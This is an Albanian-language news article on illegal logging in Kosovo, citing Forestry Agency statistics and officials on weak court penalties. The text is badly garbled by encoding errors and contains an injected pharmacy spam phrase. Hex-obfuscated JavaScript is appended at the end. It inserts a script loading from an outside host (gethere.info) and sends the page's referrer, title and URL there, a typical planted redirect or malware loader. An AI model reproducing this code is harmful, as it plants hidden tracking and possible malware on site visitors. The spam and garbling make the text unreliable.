f1_pyjet1353316269 (1)

Toleranca ndaj prerA�sve ilegalA� po shkatA�rron pyjet

cialis vendita on linea dal canada. GjatA� kA�tij viti mbi 5 mijA� fletA�paraqitje kundA�rvajtA�se dhe penale janA� shqiptuar pA�r prerA�sit ilegalA� tA� pyjeve tA� KosovA�s. PA�rfaqA�sues tA� AgjencisA� Pyjore tA� KosovA�s (APK) bA�jnA� tA� ditur se mbi 35 pA�r qind tA� rasteve qA� zihen duke prerA� drunj ilegalisht lidhen me persona recidivA�.A�

Kryeshefi i kA�saj agjencie, Ahmet Zejnullahu, ka potencuar se sfida mA� e madhe lidhur me kA�tA� dukuri A�shtA� neglizhenca e gjykatave pA�r ta��i shqyrtuar kA�to lA�ndA� dhe pA�r tA� dhA�nA� ndA�shkimin e duhur sidomos pA�r prerA�sit recidivistA� tA� pyjeve.

a�?Nuk jemi te kA�naqur me shqyrtimin e lA�ndA�ve, e cila dallon nA�pA�r komuna. Shumica e fletA�paraqitjeve, mbi 50 pA�r qind tA� tyre, pA�r shkak tA� vjetA�rsisA� nuk shqyrtohen fare, ndA�rsa nA� shumicA�n e rasteve edhe ato qA� shqyrtohen jepen gjoba shumA� tA� ulA�ta qA� nganjA�herA� mA� shumA� janA� stimuluese sesa ndA�shkuesea�?, ka thA�nA� Zejnullahu.

Ai ka potencuar se pA�r mbrojtjen e pyjeve autoritetet komunale kanA� marrA� njA� varg aktivitetesh dhe se ende funksionojnA� pikat permanente tA� kontrollit nA� disa rajone qA� janA� tA� vendosura sA� bashku me PolicinA� e KosovA�s (PK) si nA� grykA�n e DeA�anit, tA� RugovA�s, KaA�anikut etj. a�?Agjencia e pylltarisA� ka nA�nshkruar njA� memorandum mirA�kuptimi sA� bashku me PK-nA� qA� sidomos nA� grykA�n e DeA�anit tA� ketA� kontroll 24-orA�sh pA�r ta parandaluar dukurinA� e prerjesa�?, ka thA�nA� Zejnullahu.

Zejnullahu ka bA�rA� tA� ditur se Inspektorati qendror i PyjeveA� nA� kuadA�r tA� APK-sA� nga janari deri nA� shtator tA� kA�tij viti ka kryer mbi 600 kontrolle nA� subjekte afariste, drejtori rajonale, komuna, tregje, qarkullim rrugor dhe ngastra pyjore.

a�?JanA� konfiskuar 1 mijA� e 400 metra kub masA� drunore, ndA�rsa numri i fletA�paraqitjeve tA� ushtruara pA�r veprime ilegale tA� prerjeve dhe aktiviteteve tA� tjera pa leje nA� pyje dhe toka pyjore nA� kA�tA� vit A�shtA� 5 mijA� e 466 fletA�paraqitjea�?, ka thA�nA� Zejnullahu.

Ai ka pohuar se gjatA� kA�tij viti do tA� bA�het edhe pajisja me armA� pA�r rojat e pyjeve, gjA� qA� i shkon nA� funksion a�?mbrojtjes mA� tA� mirA�a�? tA� pyjeve.

Po ashtu, sipas Zejnullahut, kA�tA� vit janA� duke u pyllA�zuar 545 hektarA� sipA�rfaqe tA� zhveshura nA� tA�rA� KosovA�n. a�?PyllA�zimi kryesisht bA�het me drunj halorA�, si dru teknik. NjA� druri tA� tillA� i nevojiten mbi 30 vjet qA� tA� rritet. Kjo bA�het me qA�llim tA� pA�rmirA�simit tA� pyjeve dhe mbrojtjes sA� ambientita�?, ka shtuar ai.

Ajshe Qorraj-Berisha, zA�dhA�nA�se e KA�shillit GjyqA�sor tA� KosovA�s (KGJK), lidhur me ndA�shkimet e a�?voglaa�? pA�r prerA�sit ilegalA� tA� pyjeve, ka thA�nA� se gjyqtarA�t e KosovA�s japin dA�nime aq sa lejon ligji.

Sa u pA�rket statistikave policore pA�r vjedhje tA� pyjeve, nga janari deri mA� 9 nA�ntor tA� kA�tij viti nA� PK janA� lajmA�ruar vetA�m 587 raste tA� tilla.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}